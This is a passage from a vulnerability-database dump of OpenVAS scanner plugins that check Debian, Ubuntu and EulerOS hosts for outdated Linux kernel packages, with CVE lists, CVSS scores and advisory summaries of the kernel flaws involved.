rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-support-3.16.0-4\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xen-linux-system-3.16.0-4-amd64\", ver:\"3.16.7-ckt20-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-doc-3.2\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-486\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-4kc-malta\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-5kc-malta\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-686-pae\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-amd64\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-armel\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-armhf\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-i386\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-ia64\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mips\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mipsel\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-powerpc\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-s390\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-s390x\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-sparc\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-amd64\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-common\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-common-rt\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-iop32x\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-itanium\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-ixp4xx\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-kirkwood\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-loongson-2f\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mckinley\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mv78xx0\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mx5\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-octeon\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-omap\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-orion5x\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-powerpc\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-powerpc-smp\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-powerpc64\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r4k-ip22\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-cobalt\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-ip32\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-rt-686-pae\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-rt-amd64\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-s390x\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1-bcm91250a\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1a-bcm91480b\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sparc64\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sparc64-smp\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-versatile\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-vexpress\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-486\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-4kc-malta\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-5kc-malta\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-686-pae\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-686-pae-dbg\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-amd64\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-amd64-dbg\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-iop32x\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-itanium\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-ixp4xx\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-kirkwood\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-loongson-2f\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mckinley\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mv78xx0\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mx5\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-octeon\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-omap\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-orion5x\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-powerpc\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-powerpc-smp\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-powerpc64\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r4k-ip22\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-cobalt\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-ip32\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-686-pae\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-686-pae-dbg\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-amd64\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-amd64-dbg\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-s390x\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-s390x-dbg\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-s390x-tape\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1-bcm91250a\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1a-bcm91480b\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sparc64\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sparc64-smp\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-versatile\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-vexpress\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-manual-3.2\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-source-3.2\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-support-3.2.0-4\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xen-linux-system-3.2.0-4-686-pae\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xen-linux-system-3.2.0-4-amd64\", ver:\"3.2.73-2+deb7u3\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:35:37", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-05-10T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux-ti-omap4 USN-2967-2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2782", "CVE-2016-2543", "CVE-2016-2069", "CVE-2016-2847", "CVE-2016-2548", "CVE-2016-0723", "CVE-2016-0774", "CVE-2016-2547", "CVE-2015-8812", "CVE-2016-2544", "CVE-2016-0821", "CVE-2015-7515", "CVE-2016-2545", "CVE-2015-7833", "CVE-2015-8767", "CVE-2013-4312", "CVE-2016-2546", "CVE-2015-7566", "CVE-2016-2549", "CVE-2015-1805"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842735", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842735", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-ti-omap4 USN-2967-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842735\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-10 05:20:13 +0200 (Tue, 10 May 2016)\");\n script_cve_id(\"CVE-2013-4312\", \"CVE-2015-7515\", \"CVE-2015-7566\", \"CVE-2015-7833\",\n \t\t\"CVE-2015-8767\", \"CVE-2015-8812\", \"CVE-2016-0723\", \"CVE-2015-1805\",\n \t\t\"CVE-2016-0774\", \"CVE-2016-0821\", \"CVE-2016-2069\", \"CVE-2016-2543\",\n\t \t\"CVE-2016-2544\", \"CVE-2016-2545\", \"CVE-2016-2546\", \"CVE-2016-2547\",\n \t\t\"CVE-2016-2548\", \"CVE-2016-2549\", \"CVE-2016-2782\", \"CVE-2016-2847\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-ti-omap4 USN-2967-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-ti-omap4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that the Linux kernel\n did not properly enforce rlimits for file descriptors sent over UNIX domain\n sockets. A local attacker could use this to cause a denial of service.\n (CVE-2013-4312)\n\n Ralf Spenneberg discovered that the Aiptek Tablet USB device driver in the\n Linux kernel did not properly sanity check the endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2015-7515)\n\n Ralf Spenneberg discovered that the USB driver for Clie devices in the\n Linux kernel did not properly sanity check the endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2015-7566)\n\n Ralf Spenneberg discovered that the usbvision driver in the Linux kernel\n did not properly sanity check the interfaces and endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2015-7833)\n\n It was discovered that a race condition existed when handling heartbeat-\n timeout events in the SCTP implementation of the Linux kernel. A remote\n attacker could use this to cause a denial of service. (CVE-2015-8767)\n\n Venkatesh Pottem discovered a use-after-free vulnerability in the Linux\n kernel's CXGB3 driver. A local attacker could use this to cause a denial of\n service (system crash) or possibly execute arbitrary code. (CVE-2015-8812)\n\n It was discovered that a race condition existed in the ioctl handler for\n the TTY driver in the Linux kernel. A local attacker could use this to\n cause a denial of service (system crash) or expose sensitive information.\n (CVE-2016-0723)\n\n It was discovered that the Linux kernel did not keep accurate track of pipe\n buffer details when error conditions occurred, due to an incomplete fix for\n CVE-2015-1805. A local attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code with administrative\n privileges. (CVE-2016-0774)\n\n Zach Riggle discovered that the Linux kernel's list poison feature did not\n take into account the mmap_min_addr value. A local attacker could use this\n to bypass the kernel's poison-pointer protection mechanism while attempting\n to exploit an existing kernel vulnerability. (CVE-2016-0821)\n\n Andy Lutomirski discovered a race condition in the Linux kernel's\n translation lookaside buffer (TLB) handling of flush events. A local\n attacker could use this to cause a denial of service or possibly leak\n sensitive information. (CVE-2016-2069)\n\n Dmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA)\n framework did not verify that a FIFO was attached to a c ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"linux-ti-omap4 on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2967-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2967-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-1480-omap4\", ver:\"3.2.0-1480.106\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:39:13", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1488)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8215", "CVE-2015-6252", "CVE-2015-5364", "CVE-2015-7550", "CVE-2015-5257", "CVE-2015-6526", "CVE-2015-5366", "CVE-2015-7872", "CVE-2015-5307", "CVE-2015-7613", "CVE-2015-7513", "CVE-2015-7312", "CVE-2015-7515", "CVE-2015-7990", "CVE-2015-5697", "CVE-2015-7799", "CVE-2015-7566", "CVE-2015-5283", "CVE-2015-5707", "CVE-2015-5157", "CVE-2015-6937", "CVE-2015-8104"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191488", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191488", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1488\");\n script_version(\"2020-01-23T11:54:37+0000\");\n script_cve_id(\"CVE-2015-5157\", \"CVE-2015-5257\", \"CVE-2015-5283\", \"CVE-2015-5307\", \"CVE-2015-5364\", \"CVE-2015-5366\", \"CVE-2015-5697\", \"CVE-2015-5707\", \"CVE-2015-6252\", \"CVE-2015-6526\", \"CVE-2015-6937\", \"CVE-2015-7312\", \"CVE-2015-7513\", \"CVE-2015-7515\", \"CVE-2015-7550\", \"CVE-2015-7566\", \"CVE-2015-7613\", \"CVE-2015-7799\", \"CVE-2015-7872\", \"CVE-2015-7990\", \"CVE-2015-8104\", \"CVE-2015-8215\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:54:37 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:54:37 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1488)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1488\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1488\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-1488 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A flaw was found in the way the Linux kernel handled IRET faults during the processing of NMIs. An unprivileged, local user could use this flaw to crash the system or, potentially (although highly unlikely), escalate their privileges on the system.(CVE-2015-5157)\n\nA denial of service vulnerability was found in the WhiteHEAT USB Serial Driver (whiteheat_attach function in drivers/usb/serial/whiteheat.c). In the driver, the COMMAND_PORT variable was hard coded and set to 4 (5th element). The driver assumed that the number of ports would always be 5 and used port number 5 as the command port. However, when using a USB device in which the number of ports was set to a number less than 5 (for example, 3), the driver triggered a kernel NULL-pointer dereference. A non-privileged attacker could use this flaw to panic the host.(CVE-2015-5257)\n\nA NULL pointer dereference flaw was found in the SCTP implementation. A local user could use this flaw to cause a denial of service on the system by triggering a kernel panic when creating multiple sockets in parallel while the system did not have the SCTP module loaded.(CVE-2015-5283)\n\nIt was found that the x86 ISA (Instruction Set Architecture) is prone to a denial of service attack inside a virtualized environment in the form of an infinite loop in the microcode due to the way (sequential) delivering of benign exceptions such as #AC (alignment check exception) is handled. A privileged user inside a guest could use this flaw to create denial of service conditions on the host kernel.(CVE-2015-5307)\n\nA flaw was found in the way the Linux kernel's networking implementation handled UDP packets with incorrect checksum values. A remote attacker could potentially use this flaw to trigger an infinite loop in the kernel, resulting in a denial of service on the system, or cause a denial of service in applications using the edge triggered epoll 